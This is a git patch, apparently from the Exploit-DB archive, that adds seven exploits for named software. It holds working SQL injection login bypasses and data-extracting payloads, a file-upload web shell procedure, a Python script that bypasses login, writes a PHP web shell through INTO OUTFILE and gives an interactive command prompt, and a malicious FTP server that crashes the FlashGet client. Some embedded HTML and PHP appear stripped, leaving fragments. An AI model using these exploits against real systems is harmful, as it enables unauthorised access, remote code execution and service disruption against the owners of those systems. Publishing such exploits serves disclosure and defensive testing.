From c1eb769a9820fa757a1b577196f26fe3cd883811 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 8 May 2020 05:01:51 +0000 Subject: [PATCH] DB: 2020-05-08 7 changes to exploits/shellcodes FlashGet 1.9.6 - Denial of Service (PoC) Car Park Management System 1.0 - Authentication Bypass Draytek VigorAP 1000C - Persistent Cross-Site Scripting School File Management System 1.0 - 'username' SQL Injection Online Clothing Store 1.0 - Arbitrary File Upload Pisay Online E-Learning System 1.0 - Remote Code Execution Online AgroCulture Farm Management System 1.0 - 'pid' SQL Injection --- exploits/hardware/webapps/48436.txt | 147 ++++++++++++++++++++++++++++ exploits/php/webapps/48435.txt | 29 ++++++ exploits/php/webapps/48437.txt | 32 ++++++ exploits/php/webapps/48438.txt | 22 +++++ exploits/php/webapps/48439.txt | 74 ++++++++++++++ exploits/php/webapps/48440.txt | 51 ++++++++++ exploits/windows/dos/48434.py | 54 ++++++++++ files_exploits.csv | 7 ++ 8 files changed, 416 insertions(+) create mode 100644 exploits/hardware/webapps/48436.txt create mode 100644 exploits/php/webapps/48435.txt create mode 100644 exploits/php/webapps/48437.txt create mode 100644 exploits/php/webapps/48438.txt create mode 100644 exploits/php/webapps/48439.txt create mode 100644 exploits/php/webapps/48440.txt create mode 100755 exploits/windows/dos/48434.py diff --git a/exploits/hardware/webapps/48436.txt b/exploits/hardware/webapps/48436.txt new file mode 100644 index 000000000..0260e847c --- /dev/null +++ b/exploits/hardware/webapps/48436.txt @@ -0,0 +1,147 @@ +# Title: Draytek VigorAP 1000C - Persistent Cross-Site Scripting +# Author: Vulnerability Laboratory +# Date: 2020-05-07 +# Vendor: https://www.draytek.com/ +# Software: https://www.draytek.com/products/vigorap-903/ +# CVE: N/A + +Document Title: +=============== +Draytek VigorAP - (RADIUS) Persistent XSS Vulnerability + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2244 + + +Common Vulnerability Scoring System: +==================================== +4 + + +Product & Service Introduction: +=============================== +https://www.draytek.com/ +https://www.draytek.com/products/vigorap-903/ + + + +Affected Product(s): +==================== +Draytek +[+] VigorAP 1000C | 1.3.2 +[+] VigorAP 700 | 1.11 +[+] VigorAP 710 | 1.2.5 +[+] VigorAP 800 | 1.1.4 +[+] VigorAP 802 | 1.3.2 +[+] VigorAP 810 | 1.2.5 +[+] VigorAP 900 | 1.2.0 +[+] VigorAP 902 | 1.2.5 +[+] VigorAP 903 | 1.3.1 +[+] VigorAP 910C | 1.2.5 +[+] VigorAP 912C | 1.3.2 +[+] VigorAP 918R Series | 1.3.2 +[+] VigorAP 920R Series | 1.3.0 +[+] All other VigorAP Series with Radius Module + + +Vulnerability Disclosure Timeline: +================================== +2020-05-07: Public Disclosure (Vulnerability Laboratory) + + +Technical Details & Description: +================================ +A persistent input validation vulnerability has been discovered in the +official Draytek VigorAP product series application. +The vulnerability allows remote attackers to inject own malicious script +codes with persistent attack vector to compromise +browser to web-application requests from the application-side. + +The persistent input validation web vulnerability is located in the +username input field of the RADIUS Setting - RADIUS Server +Configuration module. Remote attackers with limited access are able to +inject own malicious persistent script codes as username. +Other privileged user accounts execute on preview of the modules +context. The request method to inject is POST and the attack +vector is located on the application-side. + +Successful exploitation of the vulnerability results in session +hijacking, persistent phishing attacks, persistent external +redirects to malicious source and persistent manipulation of affected +application modules. + +Vulnerable Module(s): +[+] RADIUS Setting - RADIUS Server Configuration - Users Profile + +Vulnerable Input(s): +[+] Username + + +Proof of Concept (PoC): +======================= +The persistent input validation web vulnerabilities can be exploited by +remote attackers with low privileged user account and low user interaction. +For security demonstration or to reproduce the security vulnerability +follow the provided information an steĆ¼s below to continue. + + +PoC: Payload + + + +PoC: Vulnerable Source (http:/vigorAP.localhost:50902/home.asp) +
+ + + + + + + + + + + + + +
UsernamePasswordConfirm PasswordConfigure
+
+ + + + + + + + +tr> +
NO.UsernameSelect
1test
2 +
+

+ +

+ + +Reference(s): +http:/vigorAP.localhost:50902/ +http:/vigorAP.localhost:50902/home.asp + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/php/webapps/48435.txt b/exploits/php/webapps/48435.txt new file mode 100644 index 000000000..431b45a16 --- /dev/null +++ b/exploits/php/webapps/48435.txt @@ -0,0 +1,29 @@ +# Exploit Title: Car Park Management System 1.0 - Authentication Bypass +# Date: 2020-05-07 +# Exploit Author: Tarun Sehgal +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/car-park-management-system.zip +# Version: 1.0 +# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 + +--------------------------------------------------------------------------------- + +#parameter Vulnerable: phone and password +#Injected Request +#Below request will allow authentication bypass + +POST /Car%20Park%20Management%20System/proc/login.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 52 +Origin: http://localhost +Connection: close +Referer: http://localhost/Car%20Park%20Management%20System/ +Cookie: PHPSESSID=d84agc0pp6qihtm7u775ftvukd +Upgrade-Insecure-Requests: 1 + +phone=' or '1'='1&password=' or '1'='1&Submit=Log+In \ No newline at end of file diff --git a/exploits/php/webapps/48437.txt b/exploits/php/webapps/48437.txt new file mode 100644 index 000000000..56e9304bb --- /dev/null +++ b/exploits/php/webapps/48437.txt @@ -0,0 +1,32 @@ +# Exploit Title: School File Management System 1.0 - 'username' SQL Injection +# Date: 2020-05-04 +# Exploit Author: Tarun Sehgal +# Vendor Homepage: https://www.sourcecodester.com/php/14155/school-file-management-system.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/school-file-management-system.zip +# Version: 1.0 +# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 + +--------------------------------------------------------------------------------- + +#parameter Vulnerable: username +# Injected Request +POST /sfms/admin/index.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 173 +Origin: http://localhost +Connection: close +Referer: http://localhost/sfms/admin/index.php +Cookie: PHPSESSID=084gi60nhgqp5lpba3q6qngk9g +Upgrade-Insecure-Requests: 1 + +username=admin' OR 1 GROUP BY CONCAT(database(),(SELECT (CASE WHEN (7665=7665) THEN 1 ELSE 0 END)),0x3a,0x3a,version(),FLOOR(RAND(0)*2)) HAVING MIN(0)#&password=admin&login= + + + +//Comment +Above request will print database name and MariaDB version. \ No newline at end of file diff --git a/exploits/php/webapps/48438.txt b/exploits/php/webapps/48438.txt new file mode 100644 index 000000000..d1694393e --- /dev/null +++ b/exploits/php/webapps/48438.txt @@ -0,0 +1,22 @@ +# Exploit Title: Online Clothing Store 1.0 - Arbitrary File Upload +# Date: 2020-05-05 +# Exploit Author: Sushant Kamble and Saurav Shukla +# Vendor Homepage: https://www.sourcecodester.com/php/14185/online-clothing-store.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-clothing-store_0.zip +# Version: 1.0 +# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 + + +#Vulnerable Page: Products.php + +#Exploit + Open Products.php and select any product + Fill details + Create php shell code with below script + &1'); ?> + Click on upload Image + Select php file + Click Submet + Access below URL: + http://localhost/online%20Clothing%20Store/Products/shell.php?e=dir + add system commands after e to execute it. \ No newline at end of file diff --git a/exploits/php/webapps/48439.txt b/exploits/php/webapps/48439.txt new file mode 100644 index 000000000..e5d2f212d --- /dev/null +++ b/exploits/php/webapps/48439.txt @@ -0,0 +1,74 @@ +# Exploit Title: Pisay Online E-Learning System 1.0 - Remote Code Execution +# Exploit Author: Bobby Cooke +# Date: 2020-05-05 +# Vendor Homepage: https://www.sourcecodester.com/php/14192/pisay-online-e-learning-system-using-phpmysql.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/e-learningsystem_0.zip +# Version: 1.0 +# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4 +# Description: Pisay Online E-Learning System v1.0 - SQLi Auth Bypass + Remote Code Execution (RCE) + +# Vulnerable Source Code: +# /e-learningsystem/admin/login.php +# 121 $email = trim($_POST['user_email']); +# 122 $upass = trim($_POST['user_pass']); +# 123 $h_upass = sha1($upass); +# 132 $user = new User(); +# 134 $res = $user::userAuthentication($email, $h_upass); +# /e-learningsystem/include/accounts.php +# 3 class User { +# 23 static function userAuthentication($email,$h_pass){ +# 25 $mydb->setQuery("SELECT * FROM `tblusers` WHERE `UEMAIL` = '". $email ."' and `PASS` = '". $h_pass ."'"); +# /e-learningsystem/admin/modules/lesson/edit.php +# 6 @$id = $_GET['id']; +# 7 if($id==''){ +# 10 $lesson = New Lesson(); +# 11 $res = $lesson->single_lesson($id); +# /e-learningsystem/include/lessons.php +# 4 class Lesson { +# 5 protected static $tblname = "tbllesson"; +# 35 function single_lesson($id=0){ +# 37-38 $mydb->setQuery("SELECT * FROM ".self::$tblname." Where LessonID= '{$id}' LIMIT 1"); + +import requests, sys, re + +requests.packages.urllib3.\ +disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) + +def webshell(SERVER_URL): + try: + while True: + cmd = raw_input('C:\\ ') + command = {'cmd': cmd} + r2 = s.get(SERVER_URL+'../../../../webshell.php', params=command, verify=False) + response = r2.text + cleanResponse = response.replace('AAAAAAAAAAAAAAA', '') + cleanResponse = cleanResponse.replace('313371337', '') + print(cleanResponse) + except: + print("\r\nExiting.") + sys.exit(-1) + +if __name__ == "__main__": + if len(sys.argv) != 2: + print "(+) Usage: %s " % sys.argv[0] + print "(+) Example: %s 'https://10.0.0.3:443/e-learningsystem/'" % sys.argv[0] + sys.exit(-1) + SERVER_URL = sys.argv[1] + ADMIN_URL = SERVER_URL + 'admin/login.php' + LESSON_URL = SERVER_URL + 'admin/modules/lesson/index.php' + s = requests.Session() + s.get(SERVER_URL, verify=False) + payload1 = {'user_email': "boku' OR 1337=1337 LIMIT 1 -- PowerUp", 'user_pass': 'InstantTransmission', 'btnLogin': ''} + s.post(ADMIN_URL, data=payload1, verify=False) + + payload2 = {'view': 'edit', 'id': '31337\' AND 1337=31337 union all select 313371337,"AAAAAAAAAAAAAAA",@@datadir,"AAAAAAAAAAAAAAA","AAAAAAAAAAAAAAA" -- kamahamaha'} + r1 = s.get(LESSON_URL, params=payload2, verify=False) + dirtyPath = str(re.findall(r'"Title" type="text" value=".*>', r1.text)) + dataPath=re.sub('^.*"Title" type="text" value="', '', dirtyPath) + dataPath=re.sub('">.*$', '', dataPath) + dataPath=dataPath.replace('\\\\', '/') + xamppPath=re.sub('xampp.*', 'xampp', dataPath) + payload3 = {'view': 'edit', 'id': '31337\' AND 1337=31337 union all select 313371337,"AAAAAAAAAAAAAAA","","AAAAAAAAAAAAAAA","AAAAAAAAAAAAAAA" into OUTFILE \''+xamppPath+'/htdocs/webshell.php\' -- kamahamaha'} + print(payload3) + s.get(LESSON_URL, params=payload3, verify=False) + webshell(SERVER_URL) \ No newline at end of file diff --git a/exploits/php/webapps/48440.txt b/exploits/php/webapps/48440.txt new file mode 100644 index 000000000..4e79b1d9d --- /dev/null +++ b/exploits/php/webapps/48440.txt @@ -0,0 +1,51 @@ +# Exploit Title: Online AgroCulture Farm Management System 1.0 - 'pid' SQL Injection +# Google Dork: N/A +# Date: 2020-05-07 +# Exploit Author: BKpatron +# Vendor Homepage: https://www.sourcecodester.com/php/14198/online-agroculture-farm-management-system-phpmysql.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14198&title=Online+AgroCulture+Farm+Management+System+in+PHP%2FMySQL +# Version: v1.0 +# Tested on: Win 10 +# CVE: N/A +# my website: bkpatron.com + +# Discription: +The Online AgroCulture Farm Management System v1.0 application is vulnerable to +SQL injection via the 'pid' parameter on the review.php page. +# vulnerable file : review.php +http://localhost/AgroCulture/review.php?pid=27 + +Parameter: pid (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: pid=27' AND 5853=5853 AND 'EmvW'='EmvW + + Type: error-based + Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + Payload: pid=27' AND (SELECT 9739 FROM(SELECT COUNT(*),CONCAT(0x7170627071,(SELECT (ELT(9739=9739,1))),0x7176626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'tpnl'='tpnl + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: pid=27' AND (SELECT 7650 FROM (SELECT(SLEEP(5)))bwDl) AND 'IWff'='IWff + + Type: UNION query + Title: Generic UNION query (NULL) - 8 columns + Payload: pid=-6157' UNION ALL SELECT NULL,NULL,CONCAT(0x7170627071,0x6d7a6346644349635a495a424c56644c51666866664553794e674764546a6c67747a69634749516a,0x7176626a71),NULL,NULL,NULL,NULL,NULL-- RXWN +[INFO] the back-end DBMS is MySQL +web application technology: PHP, Apache 2.4.39, PHP 7.2.18 +back-end DBMS: MySQL >= 5.0 + + +# Proof of Concept: +http://localhost/vulnerability/ncn/AgroCulture/review.php?pid=sqli + +GET AgroCulture/review.php?pid=27 HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie:PHPSESSID=gd27cb23t7m8o57giuvh0f8e7m +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +pid=-6157%27%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7170627071,0x6d7a6346644349635a495a424c56644c51666866664553794e674764546a6c67747a69634749516a,0x7176626a71),NULL,NULL,NULL,NULL,NULL--%20RXWN \ No newline at end of file diff --git a/exploits/windows/dos/48434.py b/exploits/windows/dos/48434.py new file mode 100755 index 000000000..89236db7f --- /dev/null +++ b/exploits/windows/dos/48434.py @@ -0,0 +1,54 @@ +# Exploit Title: FlashGet 1.9.6 - Denial of Service (PoC) +# Date: 2020-05-02 +# Author: Milad Karimi +# Testen on: Kali Linux +# Software Link: http://www.flashget.com/en/download.htm?uid=undefined +# Version: 1.9.6 +# CVE : N/A + +#!/usr/bin/python + +from time import sleep +from socket import * + +res = [ + '220 WELCOME!! :x\r\n', + '331 Password required for %s.\r\n', + '230 User %s logged in.\r\n', + '250 CWD command successful.\r\n', + '257 "%s/" is current directory.\r\n' # <-- %s B0f :x + ] + +buf = 'A' * 332 + +s = socket(AF_INET, SOCK_STREAM) +s.bind(('0.0.0.0', 21)) +s.listen(1) +print '[+] listening on [FTP] 21 ...\n' +c, addr = s.accept() +c.send(res[0]) + +user = '' + +for i in range(1, len(res)): + req = c.recv(1024) + print '[*][CLIENT] %s' % (req) + tmp = res[i] + if(req.find('USER') != -1): + req = req.replace('\r\n', '') + user = req.split('\x20', 1)[1] + tmp %= user + if(req.find('PASS') != -1): + tmp %= user + if(req.find('PWD') != -1): + tmp %= buf + print '[*][SERVER] %s' % (tmp) + c.send(tmp) + +sleep(5) +c.close() +s.close() + +print '[+] DONE' + +# Discovered By : Milad Karimi \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 88b87f0df..ce1992889 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6730,6 +6730,7 @@ id,file,description,date,author,type,platform,port 48305,exploits/windows/dos/48305.py,"AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)",2020-04-10,chuyreds,dos,windows, 48342,exploits/hardware/dos/48342.txt,"Cisco IP Phone 11.7 - Denial of service (PoC)",2020-04-17,"Jacob Baines",dos,hardware, 48402,exploits/windows/dos/48402.py,"VirtualTablet Server 3.0.2 - Denial of Service (PoC)",2020-05-01,"Dolev Farhi",dos,windows, +48434,exploits/windows/dos/48434.py,"FlashGet 1.9.6 - Denial of Service (PoC)",2020-05-07,"Milad karimi",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -42666,3 +42667,9 @@ id,file,description,date,author,type,platform,port 48431,exploits/ruby/webapps/48431.txt,"GitLab 12.9.0 - Arbitrary File Read",2020-05-06,KouroshRZ,webapps,ruby, 48432,exploits/php/webapps/48432.txt,"YesWiki cercopitheque 2020.04.18.1 - 'id' SQL Injection",2020-05-06,coiffeur,webapps,php, 48433,exploits/php/webapps/48433.txt,"MPC Sharj 3.11.1 - Arbitrary File Download",2020-05-06,SajjadBnd,webapps,php, +48435,exploits/php/webapps/48435.txt,"Car Park Management System 1.0 - Authentication Bypass",2020-05-07,"Tarun Sehgal",webapps,php, +48436,exploits/hardware/webapps/48436.txt,"Draytek VigorAP 1000C - Persistent Cross-Site Scripting",2020-05-07,Vulnerability-Lab,webapps,hardware, +48437,exploits/php/webapps/48437.txt,"School File Management System 1.0 - 'username' SQL Injection",2020-05-07,"Tarun Sehgal",webapps,php, +48438,exploits/php/webapps/48438.txt,"Online Clothing Store 1.0 - Arbitrary File Upload",2020-05-07,"Sushant Kamble",webapps,php, +48439,exploits/php/webapps/48439.txt,"Pisay Online E-Learning System 1.0 - Remote Code Execution",2020-05-07,boku,webapps,php, +48440,exploits/php/webapps/48440.txt,"Online AgroCulture Farm Management System 1.0 - 'pid' SQL Injection",2020-05-07,BKpatron,webapps,php,